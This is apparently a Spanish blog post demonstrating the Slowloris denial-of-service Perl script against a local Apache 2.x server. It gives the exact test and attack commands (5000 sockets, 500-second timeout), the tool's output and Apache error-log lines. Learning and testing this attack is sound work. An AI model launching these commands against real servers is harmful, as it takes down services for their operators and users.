Probando DoS con Slowloris

Slowloris, traducido al castellano como ‘loris perezoso’, ya no es sólo ese animalito que parece un oso de peluche y que da ganas de abrazarlo, también es un script en Perl que causa DoS en algunos tipos de servidores web.

Podéis encontrarlo en http://ha.ckers.org/slowloris/ e incluso en la Wikipedia :-):

Slow loris

From Wikipedia, the free encyclopedia

For the denial of service attack, see Slowloris.

The slow loris is any one of three species of loris classified in the genus Nycticebus. These slow moving….

El script se basa en la cantidad de peticiones que es capaz de mantener un servidor web de forma concurrente.

Lo que hace es saturar el pool de servicios mediante la creación de peticiones HTTP (incluido HTTPS) de manera que empieza a enviar cabeceras y más cabeceras al servidor forzándole a mantener abiertas las conexiones. Los servidores web tienen determinado un número máximo global de sockets permitidos (configurados en los ficheros correspondientes), si este número se sobrepasa el servicio web deja de responder.

Para comprobarlo, ejecutamos el script contra un servidor Apache 2.x de forma local.

Primero descargamos el susodicho script y echamos un vistazo al perldoc. En él nos indican que podemos empezar probando cual sería el mejor timeout para servidor:

# perl slowloris.pl -dns localhost -test -port 80


Defaulting to a 5 second tcp connection timeout.

Multithreading enabled.

This test could take up to 14.3666666666667 minutes.

Connection successful, now comes the waiting game...

Trying a 2 second delay:

Worked.

Trying a 30 second delay:

Worked.

Trying a 90 second delay:

Worked.

Trying a 240 second delay:

Worked.

Trying a 500 second delay:

Worked.

Remote server closed socket.

Use 500 seconds for -timeout.

Bien, ya tenemos el timeout. Ahora sólo queda lanzar el ataque :

# perl slowloris.pl -dns localhost -port 80 -timeout 500 -num 5000 -tcpto 5

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client

Multithreading enabled.
Connecting to localhost:80 every 500 seconds with 5000 sockets:
Building sockets.
Sending data.
Current stats: Slowloris has now sent 250 packets successfully.
This thread now sleeping for 500 seconds...

Building sockets.
Building sockets.
Sending data.
Current stats: Slowloris has now sent 635 packets successfully.
This thread now sleeping for 500 seconds...

Building sockets.
Sending data.
Current stats: Slowloris has now sent 776 packets successfully.
This thread now sleeping for 500 seconds...

Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
….
Building sockets.

Sending data.
Current stats: Slowloris has now sent 1098 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1348 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1645 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1831 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1842 packets successfully.
This thread now sleeping for 500 seconds...

Y comprobar que nuestro servidor web efectivamente ha caído:

Y por último, echamos un vistazo al error.log del servidor web Apache:

[Fri Aug 28 13:33:43 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:43:51 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers



Extraído de http://unlugarsinfin.blogspot.es

Comentarios